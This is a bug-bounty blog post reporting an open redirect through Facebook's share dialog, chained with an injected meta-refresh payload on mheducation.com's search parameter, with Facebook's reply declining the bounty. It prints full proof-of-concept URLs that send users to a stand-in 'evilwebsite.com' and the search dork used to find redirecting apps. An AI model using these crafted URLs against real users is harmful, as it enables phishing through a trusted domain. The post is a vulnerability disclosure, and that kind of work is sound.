Facebook vulnerable open redirect bug bounty

I found an open redirect on Facebook as I was looking for possible open redirects.

I created an app and used one of my domains to replicate the issue:

 

https://www.facebook.com/dialog/share?app_id=1305980872765022&display=popup&href=https%3A%2F%2Fwww.youtube.com%2Fwatch%3Fv%3D1DWiB7ZuLvI&feature=share&redirect_uri=http%3A%2F%2Ffacebookwhitehat.tk

In order to make it work, while browsing the link shown above, the user needs to click “cancel” or “share” buttons to get redirected.

Unfortunately in order to Facebook consider as Open Redirect, no user interaction is required for the redirect to occur.

After further research, I found that using dork (inurl:redirect_uri= site:facebook.com) some domains automatically redirect without user interaction.

Example:

https://www.facebook.com/dialog/share?app_id=664542700310619&display=popup&href=http%3A%2F%2F%2F%2Fcampustechnology.com%2Farticles%2F2016%2F10%2F18%2Fcollege-students-please-personalize-my-learning.aspx&redirect_uri=https%3A%2F%2Fwww.mheducation.com%2F

I managed to list the domains that redirect without user interaction.

After getting many domains, I used https://www.openbugbounty.org/ to find out whether any these domains was XSS Reported and unpatched.

XSS: https://www.openbugbounty.org/incidents/139639/ Is found to have a XSS vulnerability.

Changing the “searchQuery” parameter:

https://www.mheducation.com/highered/search.html?searchQuery=<meta http-equiv=”refresh” content=”0; url=http://evilwebsite.com/” />

User is redirected to evilwebsite.com

Proof of concept:

By changing the “redirect_uri” parameter with the domain link with open redirect vulnerability, we can craft the follow URL.

https://www.facebook.com/dialog/share?app_id=664542700310619&display=popup&href=http%3A%2F%2F%2F%2Fcampustechnology.com%2Farticles%2F2016%2F10%2F18%2Fcollege-students-please-personalize-my-learning.aspx&redirect_uri=https%3A%2F%2Fwww.mheducation.com%2Fhighered%2Fsearch.html%3FsearchQuery%3D<meta http-equiv=”refresh” content=”0; url=http://evilwebsite.com/” />

This URL will redirect to evilwebsite.com

Which opens the door for the following attack scenario:

Hacker finds an open redirect vulnerability in one of the domains and use it to have an open redirect in Facebook.

Facebook reply:

Thank you for sharing this information with us. It looks like you have set up an App that has the domain “www.mheducation.com” whitelisted, and this domain has an XSS vulnerability that allows you to redirect after that. An App owner setting a vulnerable site as their redirect is not within Facebook’s control. Further more the redirect to a malicious site happens off the Facebook domain. Although this issue does not qualify as a part of our bounty program we appreciate your report. We will follow up with you on any security bugs or with any further questions we may have.

Agradecemos que tenhas contactado o Facebook.

Jackson
Security

Conclusion:

This open redirect working in other applications, affect Facebook application just like any other open redirect do. The idea of open redirect vulnerabilities is to use the trust a user has in a specific domain in this case I’m using Facebook domain.

 

Be First to Comment

    Leave a Reply

    Your email address will not be published. Required fields are marked *

    This site uses Akismet to reduce spam. Learn how your comment data is processed.